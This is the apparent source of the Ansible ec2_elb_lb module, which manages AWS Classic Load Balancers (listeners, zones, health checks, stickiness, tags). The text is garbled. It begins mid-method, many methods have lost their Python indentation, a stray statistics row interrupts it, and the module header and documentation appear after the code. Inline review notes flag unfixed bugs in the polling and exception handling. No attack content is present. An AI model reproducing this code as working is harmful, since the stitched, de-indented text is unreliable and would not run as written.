                app_cookie_policy = None
            info = {
                'name': check_elb.name,
                'dns_name': check_elb.dns_name,
                'zones': check_elb.availability_zones,
                'security_group_ids': check_elb.security_groups,
                'status': self.status,
                'subnets': self.subnets,
                'scheme': check_elb.scheme,
                'hosted_zone_name': check_elb.canonical_hosted_zone_name,
                'hosted_zone_id': check_elb.canonical_hosted_zone_name_id,
                'lb_cookie_policy': lb_cookie_policy,
                'app_cookie_policy': app_cookie_policy,
                'proxy_policy': self._get_proxy_protocol_policy(),
                'backends': self._get_backend_policies(),
                'instances': [instance.id for instance in check_elb.instances],
                'out_of_service_count': 0,
                'in_service_count': 0,
                'unknown_instance_state_count': 0,
                'region': self.region
            }
            # status of instances behind the ELB
            if info['instances']:
                info['instance_health'] = [dict(
                    instance_id=instance_state.instance_id,
                    reason_code=instance_state.reason_code,
                    state=instance_state.state
                ) for instance_state in self.elb_conn.describe_instance_health(self.name)]
            else:
                info['instance_health'] = []
            # instance state counts: InService or OutOfService
            if info['instance_health']:
                for instance_state in info['instance_health']:
                    if instance_state['state'] == "InService":
                        info['in_service_count'] += 1
                    elif instance_state['state'] == "OutOfService":
                        info['out_of_service_count'] += 1
                    else:
                        info['unknown_instance_state_count'] += 1
            if check_elb.health_check:
                info['health_check'] = {
                    'target': check_elb.health_check.target,
                    'interval': check_elb.health_check.interval,
                    'timeout': check_elb.health_check.timeout,
                    'healthy_threshold': check_elb.health_check.healthy_threshold,
                    'unhealthy_threshold': check_elb.health_check.unhealthy_threshold,
                }
            if check_elb.listeners:
                info['listeners'] = [self._api_listener_as_tuple(l)
                                     for l in check_elb.listeners]
            elif self.status == 'created':
                # When creating a new ELB, listeners don't show in the
                # immediately returned result, so just include the
                # ones that were added
                info['listeners'] = [self._listener_as_tuple(l)
                                     for l in self.listeners]
            else:
                info['listeners'] = []
            if self._check_attribute_support('connection_draining'):
                info['connection_draining_timeout'] = int(self.elb_conn.get_lb_attribute(self.name, 'ConnectionDraining').timeout)
            if self._check_attribute_support('connecting_settings'):
                info['idle_timeout'] = self.elb_conn.get_lb_attribute(self.name, 'ConnectingSettings').idle_timeout
            if self._check_attribute_support('cross_zone_load_balancing'):
                is_cross_az_lb_enabled = self.elb_conn.get_lb_attribute(self.name, 'CrossZoneLoadBalancing')
                if is_cross_az_lb_enabled:
                    info['cross_az_load_balancing'] = 'yes'
                else:
                    info['cross_az_load_balancing'] = 'no'
        # return stickiness info?
        info['tags'] = self.tags
        return info
    @_throttleable_operation(_THROTTLING_RETRIES)
    def _wait_for_elb_removed(self):
        """Poll until describing the ELB raises LoadBalancerNotFound.

        Returns True if the ELB disappeared within wait_timeout, else False.
        """
        polling_increment_secs = 15
        max_retries = (self.wait_timeout // polling_increment_secs)
        status_achieved = False
        for x in range(0, max_retries):
            try:
                self.elb_conn.get_all_lb_attributes(self.name)
            except (boto.exception.BotoServerError, Exception) as e:
                # NOTE(review): a non-boto Exception caught here may not carry a
                # .code attribute -- presumably only boto errors occur; verify.
                # NOTE(review): when the describe call succeeds (ELB still
                # exists) the loop re-polls immediately without sleeping.
                if "LoadBalancerNotFound" in e.code:
                    status_achieved = True
                    break
                else:
                    time.sleep(polling_increment_secs)
        return status_achieved
    @_throttleable_operation(_THROTTLING_RETRIES)
    def _wait_for_elb_interface_removed(self):
        """Poll until the ELB's network interfaces are gone.

        The candidate interfaces are looked up once (by the 'amazon-elb'
        attachment owner and the 'ELB <name>' description), then each is
        re-described until it returns empty or InvalidNetworkInterfaceID.
        Returns True on success within wait_timeout, else False.
        """
        polling_increment_secs = 15
        max_retries = (self.wait_timeout // polling_increment_secs)
        status_achieved = False
        elb_interfaces = self.ec2_conn.get_all_network_interfaces(
            filters={'attachment.instance-owner-id': 'amazon-elb',
                     'description': 'ELB {0}'.format(self.name)})
        for x in range(0, max_retries):
            for interface in elb_interfaces:
                try:
                    result = self.ec2_conn.get_all_network_interfaces(interface.id)
                    if result == []:
                        status_achieved = True
                        break
                    else:
                        time.sleep(polling_increment_secs)
                except (boto.exception.BotoServerError, Exception) as e:
                    # NOTE(review): as above, e.code only exists on boto errors.
                    if 'InvalidNetworkInterfaceID' in e.code:
                        status_achieved = True
                        break
                    else:
                        self.module.fail_json_aws(e, 'Failure while waiting for interface to be removed')
        return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _get_elb(self):
elbs = self.elb_conn.get_all_load_balancers()
for elb in elbs:
if self.name == elb.name:
self.status = 'ok'
return elb
    def _get_elb_connection(self):
        """Return a boto ELB connection for self.region; fail the module on error."""
        try:
            return connect_to_aws(boto.ec2.elb, self.region,
                                  **self.aws_connect_params)
        except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
            self.module.fail_json_aws(e, 'Failure while connecting to AWS')
def _get_ec2_connection(self):
try:
return connect_to_aws(boto.ec2, self.region,
**self.aws_connect_params)
except (boto.exception.NoAuthHandlerFound, Exception) as e:
self.module.fail_json_aws(e, 'Failure while connecting to AWS')
@_throttleable_operation(_THROTTLING_RETRIES)
def _delete_elb(self):
# True if succeeds, exception raised if not
result = self.elb_conn.delete_load_balancer(name=self.name)
if result:
self.changed = True
self.status = 'deleted'
    def _create_elb(self):
        """Create the load balancer with the configured zones/groups/listeners.

        On success, marks the manager changed and sets status to 'created'.
        """
        listeners = [self._listener_as_tuple(l) for l in self.listeners]
        self.elb = self.elb_conn.create_load_balancer(name=self.name,
                                                      zones=self.zones,
                                                      security_groups=self.security_group_ids,
                                                      complex_listeners=listeners,
                                                      subnets=self.subnets,
                                                      scheme=self.scheme)
        if self.elb:
            # HACK: Work around a boto bug in which the listeners attribute is
            # always set to the listeners argument to create_load_balancer, and
            # not the complex_listeners
            # We're not doing a self.elb = self._get_elb here because there
            # might be eventual consistency issues and it doesn't necessarily
            # make sense to wait until the ELB gets returned from the EC2 API.
            # This is necessary in the event we hit the throttling errors and
            # need to retry ensure_ok
            # See https://github.com/boto/boto/issues/3526
            self.elb.listeners = self.listeners
            self.changed = True
            self.status = 'created'
def _create_elb_listeners(self, listeners):
"""Takes a list of listener tuples and creates them"""
# True if succeeds, exception raised if not
self.changed = self.elb_conn.create_load_balancer_listeners(self.name,
complex_listeners=listeners)
def _delete_elb_listeners(self, listeners):
"""Takes a list of listener tuples and deletes them from the elb"""
ports = [l[0] for l in listeners]
# True if succeeds, exception raised if not
self.changed = self.elb_conn.delete_load_balancer_listeners(self.name,
ports)
    def _set_elb_listeners(self):
        """
        Creates listeners specified by self.listeners; overwrites existing
        listeners on these ports; removes extraneous listeners.
        Removal happens before creation so a changed listener on the same
        port is replaced rather than rejected as a duplicate.
        """
        listeners_to_add = []
        listeners_to_remove = []
        listeners_to_keep = []
        # Check for any listeners we need to create or overwrite
        for listener in self.listeners:
            listener_as_tuple = self._listener_as_tuple(listener)
            # First we loop through existing listeners to see if one is
            # already specified for this port
            existing_listener_found = None
            for existing_listener in self.elb.listeners:
                # Since ELB allows only one listener on each incoming port, a
                # single match on the incoming port is all we're looking for
                if existing_listener[0] == int(listener['load_balancer_port']):
                    existing_listener_found = self._api_listener_as_tuple(existing_listener)
                    break
            if existing_listener_found:
                # Does it match exactly?
                if listener_as_tuple != existing_listener_found:
                    # The ports are the same but something else is different,
                    # so we'll remove the existing one and add the new one
                    listeners_to_remove.append(existing_listener_found)
                    listeners_to_add.append(listener_as_tuple)
                else:
                    # We already have this listener, so we're going to keep it
                    listeners_to_keep.append(existing_listener_found)
            else:
                # We didn't find an existing listener, so just add the new one
                listeners_to_add.append(listener_as_tuple)
        # Check for any extraneous listeners we need to remove, if desired
        if self.purge_listeners:
            for existing_listener in self.elb.listeners:
                existing_listener_tuple = self._api_listener_as_tuple(existing_listener)
                if existing_listener_tuple in listeners_to_remove:
                    # Already queued for removal
                    continue
                if existing_listener_tuple in listeners_to_keep:
                    # Keep this one around
                    continue
                # Since we're not already removing it and we don't need to keep
                # it, let's get rid of it
                listeners_to_remove.append(existing_listener_tuple)
        if listeners_to_remove:
            self._delete_elb_listeners(listeners_to_remove)
        if listeners_to_add:
            self._create_elb_listeners(listeners_to_add)
def _api_listener_as_tuple(self, listener):
"""Adds ssl_certificate_id to ELB API tuple if present"""
base_tuple = listener.get_complex_tuple()
if listener.ssl_certificate_id and len(base_tuple) < 5:
return base_tuple + (listener.ssl_certificate_id,)
return base_tuple
def _listener_as_tuple(self, listener):
"""Formats listener as a 4- or 5-tuples, in the order specified by the
ELB API"""
# N.B. string manipulations on protocols below (str(), upper()) is to
# ensure format matches output from ELB API
listener_list = [
int(listener['load_balancer_port']),
int(listener['instance_port']),
str(listener['protocol'].upper()),
]
# Instance protocol is not required by ELB API; it defaults to match
# load balancer protocol. We'll mimic that behavior here
if 'instance_protocol' in listener:
listener_list.append(str(listener['instance_protocol'].upper()))
else:
listener_list.append(str(listener['protocol'].upper()))
if 'ssl_certificate_id' in listener:
listener_list.append(str(listener['ssl_certificate_id']))
return tuple(listener_list)
def _enable_zones(self, zones):
try:
self.elb.enable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json_aws(e, msg='unable to enable zones')
self.changed = True
def _disable_zones(self, zones):
try:
self.elb.disable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json_aws(e, msg='unable to disable zones')
self.changed = True
    def _attach_subnets(self, subnets):
        """Attach the given subnet ids to the ELB and mark the module changed."""
        self.elb_conn.attach_lb_to_subnets(self.name, subnets)
        self.changed = True
    def _detach_subnets(self, subnets):
        """Detach the given subnet ids from the ELB and mark the module changed."""
        self.elb_conn.detach_lb_from_subnets(self.name, subnets)
        self.changed = True
def _set_subnets(self):
"""Determine which subnets need to be attached or detached on the ELB"""
if self.subnets:
if self.purge_subnets:
subnets_to_detach = list(set(self.elb.subnets) - set(self.subnets))
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
else:
subnets_to_detach = None
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
if subnets_to_attach:
self._attach_subnets(subnets_to_attach)
if subnets_to_detach:
self._detach_subnets(subnets_to_detach)
def _get_scheme(self):
"""Determine if the current scheme is different than the scheme of the ELB"""
if self.scheme:
if self.elb.scheme != self.scheme:
if not self.wait:
self.module.fail_json(msg="Unable to modify scheme without using the wait option")
return True
return False
def _set_zones(self):
"""Determine which zones need to be enabled or disabled on the ELB"""
if self.zones:
if self.purge_zones:
zones_to_disable = list(set(self.elb.availability_zones) -
set(self.zones))
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
else:
zones_to_disable = None
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
if zones_to_enable:
self._enable_zones(zones_to_enable)
# N.B. This must come second, in case it would have removed all zones
if zones_to_disable:
self._disable_zones(zones_to_disable)
def _set_security_groups(self):
if self.security_group_ids is not None and set(self.elb.security_groups) != set(self.security_group_ids):
self.elb_conn.apply_security_groups_to_lb(self.name, self.security_group_ids)
self.changed = True
    def _set_health_check(self):
        """Set health check values on the ELB as needed.

        Compares each desired health-check attribute with the live one and
        reconfigures the ELB only when something actually differs.
        """
        if self.health_check:
            # This just makes it easier to compare each of the attributes
            # and look for changes. Keys are attributes of the current
            # health_check; values are desired values of new health_check
            health_check_config = {
                "target": self._get_health_check_target(),
                "timeout": self.health_check['response_timeout'],
                "interval": self.health_check['interval'],
                "unhealthy_threshold": self.health_check['unhealthy_threshold'],
                "healthy_threshold": self.health_check['healthy_threshold'],
            }
            update_health_check = False
            # The health_check attribute is *not* set on newly created
            # ELBs! So we have to create our own.
            if not self.elb.health_check:
                self.elb.health_check = HealthCheck()
            for attr, desired_value in health_check_config.items():
                if getattr(self.elb.health_check, attr) != desired_value:
                    setattr(self.elb.health_check, attr, desired_value)
                    update_health_check = True
            if update_health_check:
                self.elb.configure_health_check(self.elb.health_check)
                self.changed = True
    def _check_attribute_support(self, attr):
        """Return True if the installed boto exposes ELB attribute *attr*.

        boto gained support for individual ELB attributes across several
        releases, so capabilities are probed before use.
        """
        return hasattr(boto.ec2.elb.attributes.LbAttributes(), attr)
def _set_cross_az_load_balancing(self):
attributes = self.elb.get_attributes()
if self.cross_az_load_balancing:
if not attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = True
else:
if attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'CrossZoneLoadBalancing',
attributes.cross_zone_load_balancing.enabled)
    def _set_access_log(self):
        """Enable/refresh S3 access logging when requested, otherwise disable it."""
        attributes = self.elb.get_attributes()
        if self.access_logs:
            if 's3_location' not in self.access_logs:
                self.module.fail_json(msg='s3_location information required')
            # Desired values keyed by the attribute names of boto's access_log
            # attribute object so they can be diffed generically below.
            access_logs_config = {
                "enabled": True,
                "s3_bucket_name": self.access_logs['s3_location'],
                "s3_bucket_prefix": self.access_logs.get('s3_prefix', ''),
                "emit_interval": self.access_logs.get('interval', 60),
            }
            update_access_logs_config = False
            for attr, desired_value in access_logs_config.items():
                if getattr(attributes.access_log, attr) != desired_value:
                    setattr(attributes.access_log, attr, desired_value)
                    update_access_logs_config = True
            if update_access_logs_config:
                self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
                self.changed = True
        elif attributes.access_log.enabled:
            # No access_logs requested but logging is currently on: turn it off.
            attributes.access_log.enabled = False
            self.changed = True
            self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
def _set_connection_draining_timeout(self):
attributes = self.elb.get_attributes()
if self.connection_draining_timeout is not None:
if not attributes.connection_draining.enabled or \
attributes.connection_draining.timeout != self.connection_draining_timeout:
self.changed = True
attributes.connection_draining.enabled = True
attributes.connection_draining.timeout = self.connection_draining_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
else:
if attributes.connection_draining.enabled:
self.changed = True
attributes.connection_draining.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
def _set_idle_timeout(self):
attributes = self.elb.get_attributes()
if self.idle_timeout is not None:
if attributes.connecting_settings.idle_timeout != self.idle_timeout:
self.changed = True
attributes.connecting_settings.idle_timeout = self.idle_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectingSettings', attributes.connecting_settings)
def _policy_name(self, policy_type):
return 'ec2-elb-lb-{0}'.format(to_native(policy_type, errors='surrogate_or_strict'))
def _create_policy(self, policy_param, policy_meth, policy):
getattr(self.elb_conn, policy_meth)(policy_param, self.elb.name, policy)
def _delete_policy(self, elb_name, policy):
self.elb_conn.delete_lb_policy(elb_name, policy)
def _update_policy(self, policy_param, policy_meth, policy_attr, policy):
self._delete_policy(self.elb.name, policy)
self._create_policy(policy_param, policy_meth, policy)
def _set_listener_policy(self, listeners_dict, policy=None):
policy = [] if policy is None else policy
for listener_port in listeners_dict:
if listeners_dict[listener_port].startswith('HTTP'):
self.elb_conn.set_lb_policies_of_listener(self.elb.name, listener_port, policy)
    def _set_stickiness_policy(self, elb_info, listeners_dict, policy, **policy_attrs):
        """Create or update a stickiness policy and bind it to HTTP listeners.

        policy_attrs carries: 'attr' (policies attribute name on elb_info),
        'dict_key' (policy field to compare), 'param_value' (desired value)
        and 'method' (boto creation method name).
        """
        # for-else: the else block runs only when no existing policy matched,
        # i.e. the policy has to be created from scratch.
        for p in getattr(elb_info.policies, policy_attrs['attr']):
            if str(p.__dict__['policy_name']) == str(policy[0]):
                # Existing policy found: recreate it only when its tracked
                # value differs from the requested one (None compares as 0).
                if str(p.__dict__[policy_attrs['dict_key']]) != str(policy_attrs['param_value'] or 0):
                    # Unbind from listeners before deleting/recreating.
                    self._set_listener_policy(listeners_dict)
                    self._update_policy(policy_attrs['param_value'], policy_attrs['method'], policy_attrs['attr'], policy[0])
                    self.changed = True
                break
        else:
            self._create_policy(policy_attrs['param_value'], policy_attrs['method'], policy[0])
            self.changed = True
        # (Re)attach the policy to all HTTP(S) listeners.
        self._set_listener_policy(listeners_dict, policy)
    def select_stickiness_policy(self):
        """Create, update or remove the stickiness policy described by
        self.stickiness ('loadbalancer' or 'application' type)."""
        if self.stickiness:
            if 'cookie' in self.stickiness and 'expiration' in self.stickiness:
                self.module.fail_json(msg='\'cookie\' and \'expiration\' can not be set at the same time')
            elb_info = self.elb_conn.get_all_load_balancers(self.elb.name)[0]
            d = {}
            # Map each listener's load-balancer port to its protocol.
            for listener in elb_info.listeners:
                d[listener[0]] = listener[2]
            listeners_dict = d
            if self.stickiness['type'] == 'loadbalancer':
                policy = []
                policy_type = 'LBCookieStickinessPolicyType'
                if self.module.boolean(self.stickiness['enabled']):
                    if 'expiration' not in self.stickiness:
                        self.module.fail_json(msg='expiration must be set when type is loadbalancer')
                    try:
                        # An expiration of 0 becomes None (cookie expires with
                        # the browser session); non-integers fail the module.
                        expiration = self.stickiness['expiration'] if int(self.stickiness['expiration']) else None
                    except ValueError:
                        self.module.fail_json(msg='expiration must be set to an integer')
                    policy_attrs = {
                        'type': policy_type,
                        'attr': 'lb_cookie_stickiness_policies',
                        'method': 'create_lb_cookie_stickiness_policy',
                        'dict_key': 'cookie_expiration_period',
                        'param_value': expiration
                    }
                    policy.append(self._policy_name(policy_attrs['type']))
                    self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
                elif not self.module.boolean(self.stickiness['enabled']):
                    if len(elb_info.policies.lb_cookie_stickiness_policies):
                        if elb_info.policies.lb_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
                            self.changed = True
                        else:
                            self.changed = False
                    # NOTE(review): unlike the 'application' branch below, the
                    # detach/delete here runs even when no policy exists —
                    # confirm whether the asymmetry is intentional.
                    self._set_listener_policy(listeners_dict)
                    self._delete_policy(self.elb.name, self._policy_name(policy_type))
            elif self.stickiness['type'] == 'application':
                policy = []
                policy_type = 'AppCookieStickinessPolicyType'
                if self.module.boolean(self.stickiness['enabled']):
                    if 'cookie' not in self.stickiness:
                        self.module.fail_json(msg='cookie must be set when type is application')
                    policy_attrs = {
                        'type': policy_type,
                        'attr': 'app_cookie_stickiness_policies',
                        'method': 'create_app_cookie_stickiness_policy',
                        'dict_key': 'cookie_name',
                        'param_value': self.stickiness['cookie']
                    }
                    policy.append(self._policy_name(policy_attrs['type']))
                    self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
                elif not self.module.boolean(self.stickiness['enabled']):
                    if len(elb_info.policies.app_cookie_stickiness_policies):
                        if elb_info.policies.app_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
                            self.changed = True
                        self._set_listener_policy(listeners_dict)
                        self._delete_policy(self.elb.name, self._policy_name(policy_type))
            else:
                # Unknown stickiness type: just detach policies from listeners.
                self._set_listener_policy(listeners_dict)
def _get_backend_policies(self):
"""Get a list of backend policies"""
policies = []
if self.elb.backends is not None:
for backend in self.elb.backends:
if backend.policies is not None:
for policy in backend.policies:
policies.append(str(backend.instance_port) + ':' + policy.policy_name)
return policies
def _set_backend_policies(self):
"""Sets policies for all backends"""
ensure_proxy_protocol = False
replace = []
backend_policies = self._get_backend_policies()
# Find out what needs to be changed
for listener in self.listeners:
want = False
if 'proxy_protocol' in listener and listener['proxy_protocol']:
ensure_proxy_protocol = True
want = True
if str(listener['instance_port']) + ':ProxyProtocol-policy' in backend_policies:
if not want:
replace.append({'port': listener['instance_port'], 'policies': []})
elif want:
replace.append({'port': listener['instance_port'], 'policies': ['ProxyProtocol-policy']})
# enable or disable proxy protocol
if ensure_proxy_protocol:
self._set_proxy_protocol_policy()
# Make the backend policies so
for item in replace:
self.elb_conn.set_lb_policies_of_backend_server(self.elb.name, item['port'], item['policies'])
self.changed = True
def _get_proxy_protocol_policy(self):
"""Find out if the elb has a proxy protocol enabled"""
if self.elb.policies is not None and self.elb.policies.other_policies is not None:
for policy in self.elb.policies.other_policies:
if policy.policy_name == 'ProxyProtocol-policy':
return policy.policy_name
return None
def _set_proxy_protocol_policy(self):
"""Install a proxy protocol policy if needed"""
proxy_policy = self._get_proxy_protocol_policy()
if proxy_policy is None:
self.elb_conn.create_lb_policy(
self.elb.name, 'ProxyProtocol-policy', 'ProxyProtocolPolicyType', {'ProxyProtocol': True}
)
self.changed = True
# TODO: remove proxy protocol policy if not needed anymore? There is no side effect to leaving it there
def _diff_list(self, a, b):
"""Find the entries in list a that are not in list b"""
b = set(b)
return [aa for aa in a if aa not in b]
def _get_instance_ids(self):
"""Get the current list of instance ids installed in the elb"""
instances = []
if self.elb.instances is not None:
for instance in self.elb.instances:
instances.append(instance.id)
return instances
def _set_instance_ids(self):
"""Register or deregister instances from an lb instance"""
assert_instances = self.instance_ids or []
has_instances = self._get_instance_ids()
add_instances = self._diff_list(assert_instances, has_instances)
if add_instances:
self.elb_conn.register_instances(self.elb.name, add_instances)
self.changed = True
if self.purge_instance_ids:
remove_instances = self._diff_list(has_instances, assert_instances)
if remove_instances:
self.elb_conn.deregister_instances(self.elb.name, remove_instances)
self.changed = True
def _set_tags(self):
"""Add/Delete tags"""
if self.tags is None:
return
params = {'LoadBalancerNames.member.1': self.name}
tagdict = dict()
# get the current list of tags from the ELB, if ELB exists
if self.elb:
current_tags = self.elb_conn.get_list('DescribeTags', params,
[('member', Tag)])
tagdict = dict((tag.Key, tag.Value) for tag in current_tags
if hasattr(tag, 'Key'))
# Add missing tags
dictact = dict(set(self.tags.items()) - set(tagdict.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
params['Tags.member.%d.Value' % (i + 1)] = dictact[key]
self.elb_conn.make_request('AddTags', params)
self.changed = True
# Remove extra tags
dictact = dict(set(tagdict.items()) - set(self.tags.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
self.elb_conn.make_request('RemoveTags', params)
self.changed = True
def _get_health_check_target(self):
"""Compose target string from healthcheck parameters"""
protocol = self.health_check['ping_protocol'].upper()
path = ""
if protocol in ['HTTP', 'HTTPS'] and 'ping_path' in self.health_check:
path = self.health_check['ping_path']
return "%s:%s%s" % (protocol, self.health_check['ping_port'], path)
def main():
argument_spec = dict(
state={'required': True, 'choices': ['present', 'absent']},
name={'required': True},
listeners={'default': None, 'required': False, 'type': 'list', 'elements': 'dict'},
purge_listeners={'default': True, 'required': False, 'type': 'bool'},
instance_ids={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
purge_instance_ids={'default': False, 'required': False, 'type': 'bool'},
zones={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
purge_zones={'default': False, 'required': False, 'type': 'bool'},
security_group_ids={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
security_group_names={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
health_check={'default': None, 'required': False, 'type': 'dict'},
subnets={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
purge_subnets={'default': False, 'required': False, 'type': 'bool'},
scheme={'default': 'internet-facing', 'required': False, 'choices': ['internal', 'internet-facing']},
connection_draining_timeout={'default': None, 'required': False, 'type': 'int'},
idle_timeout={'default': None, 'type': 'int', 'required': False},
cross_az_load_balancing={'default': None, 'type': 'bool', 'required': False},
stickiness={'default': None, 'required': False, 'type': 'dict'},
access_logs={'default': None, 'required': False, 'type': 'dict'},
wait={'default': False, 'type': 'bool', 'required': False},
wait_timeout={'default': 60, 'type': 'int', 'required': False},
tags={'default': None, 'required': False, 'type': 'dict'}
)
module = AnsibleAWSModule(
argument_spec=argument_spec,
check_boto3=False,
mutually_exclusive=[['security_group_ids', 'security_group_names']]
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg="Region must be specified as a parameter, in EC2_REGION or AWS_REGION environment variables or in boto configuration file")
name = module.params['name']
state = module.params['state']
listeners = module.params['listeners']
purge_listeners = module.params['purge_listeners']
instance_ids = module.params['instance_ids']
purge_instance_ids = module.params['purge_instance_ids']
zones = module.params['zones']
purge_zones = module.params['purge_zones']
security_group_ids = module.params['security_group_ids']
security_group_names = module.params['security_group_names']
health_check = module.params['health_check']
access_logs = module.params['access_logs']
subnets = module.params['subnets']
purge_subnets = module.params['purge_subnets']
scheme = module.params['scheme']
connection_draining_timeout = module.params['connection_draining_timeout']
idle_timeout = module.params['idle_timeout']
cross_az_load_balancing = module.params['cross_az_load_balancing']
stickiness = module.params['stickiness']
wait = module.params['wait']
wait_timeout = module.params['wait_timeout']
tags = module.params['tags']
if state == 'present' and not listeners:
module.fail_json(msg="At least one listener is required for ELB creation")
if state == 'present' and not (zones or subnets):
module.fail_json(msg="At least one availability zone or subnet is required for ELB creation")
if wait_timeout > 600:
module.fail_json(msg='wait_timeout maximum is 600 seconds')
if security_group_names:
security_group_ids = []
try:
ec2 = connect_to_aws(boto.ec2, region, **aws_connect_params)
if subnets: # We have at least one subnet, ergo this is a VPC
vpc_conn = _get_vpc_connection(module=module, region=region, aws_connect_params=aws_connect_params)
vpc_id = vpc_conn.get_all_subnets([subnets[0]])[0].vpc_id
filters = {'vpc_id': vpc_id}
else:
filters = None
grp_details = ec2.get_all_security_groups(filters=filters)
for group_name in security_group_names:
if isinstance(group_name, string_types):
group_name = [group_name]
group_id = [str(grp.id) for grp in grp_details if str(grp.name) in group_name]
security_group_ids.extend(group_id)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json_aws(e)
elb_man = ElbManager(module, name, listeners, purge_listeners, zones,
purge_zones, security_group_ids, health_check,
subnets, purge_subnets, scheme,
connection_draining_timeout, idle_timeout,
cross_az_load_balancing,
access_logs, stickiness, wait, wait_timeout, tags,
region=region, instance_ids=instance_ids, purge_instance_ids=purge_instance_ids,
**aws_connect_params)
# check for unsupported attributes for this version of boto
if cross_az_load_balancing and not elb_man._check_attribute_support('cross_zone_load_balancing'):
module.fail_json(msg="You must install boto >= 2.18.0 to use the cross_az_load_balancing attribute")
if connection_draining_timeout and not elb_man._check_attribute_support('connection_draining'):
module.fail_json(msg="You must install boto >= 2.28.0 to use the connection_draining_timeout attribute")
if idle_timeout and not elb_man._check_attribute_support('connecting_settings'):
module.fail_json(msg="You must install boto >= 2.33.0 to use the idle_timeout attribute")
if state == 'present':
elb_man.ensure_ok()
elif state == 'absent':
elb_man.ensure_gone()
ansible_facts = {'ec2_elb': 'info'}
ec2_facts_result = dict(changed=elb_man.changed,
elb=elb_man.get_info(),
ansible_facts=ansible_facts)
module.exit_json(**ec2_facts_result)
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
| 39.65994 | 152 | 0.616678 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: ec2_elb_lb
version_added: 1.0.0
description:
- Returns information about the load balancer.
- Will be marked changed when called only if state is changed.
short_description: Creates, updates or destroys an Amazon ELB.
author:
- "Jim Dalton (@jsdalton)"
options:
state:
description:
- Create or destroy the ELB.
type: str
choices: [ absent, present ]
required: true
name:
description:
- The name of the ELB.
type: str
required: true
listeners:
description:
- List of ports/protocols for this ELB to listen on (see examples).
type: list
elements: dict
purge_listeners:
description:
- Purge existing listeners on ELB that are not found in listeners.
type: bool
default: yes
instance_ids:
description:
- List of instance ids to attach to this ELB.
type: list
elements: str
purge_instance_ids:
description:
- Purge existing instance ids on ELB that are not found in instance_ids.
type: bool
default: no
zones:
description:
- List of availability zones to enable on this ELB.
type: list
elements: str
purge_zones:
description:
- Purge existing availability zones on ELB that are not found in zones.
type: bool
default: no
security_group_ids:
description:
- A list of security groups to apply to the ELB.
type: list
elements: str
security_group_names:
description:
- A list of security group names to apply to the ELB.
type: list
elements: str
health_check:
description:
- An associative array of health check configuration settings (see examples).
type: dict
access_logs:
description:
- An associative array of access logs configuration settings (see examples).
type: dict
subnets:
description:
- A list of VPC subnets to use when creating ELB. Zones should be empty if using this.
type: list
elements: str
purge_subnets:
description:
- Purge existing subnet on ELB that are not found in subnets.
type: bool
default: no
scheme:
description:
- The scheme to use when creating the ELB. For a private VPC-visible ELB use C(internal).
- If you choose to update your scheme with a different value the ELB will be destroyed and
recreated. To update scheme you must use the option I(wait).
type: str
choices: ["internal", "internet-facing"]
default: 'internet-facing'
connection_draining_timeout:
description:
- Wait a specified timeout allowing connections to drain before terminating an instance.
type: int
idle_timeout:
description:
- ELB connections from clients and to servers are timed out after this amount of time.
type: int
cross_az_load_balancing:
description:
- Distribute load across all configured Availability Zones.
- Defaults to C(false).
type: bool
stickiness:
description:
- An associative array of stickiness policy settings. Policy will be applied to all listeners (see examples).
type: dict
wait:
description:
- When specified, Ansible will check the status of the load balancer to ensure it has been successfully
removed from AWS.
type: bool
default: no
wait_timeout:
description:
- Used in conjunction with wait. Number of seconds to wait for the ELB to be terminated.
- A maximum of 600 seconds (10 minutes) is allowed.
type: int
default: 60
tags:
description:
- An associative array of tags. To delete all tags, supply an empty dict (C({})).
type: dict
extends_documentation_fragment:
- amazon.aws.aws
- amazon.aws.ec2
requirements:
- python >= 2.6
- boto
'''
EXAMPLES = """
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic provisioning example (non-VPC)
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
proxy_protocol: True
- protocol: https
load_balancer_port: 443
instance_protocol: http # optional, defaults to value of protocol setting
instance_port: 80
# ssl certificate required for https or ssl
ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/company/servercerts/ProdServerCert"
# Internal ELB example
- amazon.aws.ec2_elb_lb:
name: "test-vpc"
scheme: internal
state: present
instance_ids:
- i-abcd1234
purge_instance_ids: true
subnets:
- subnet-abcd1234
- subnet-1a2b3c4d
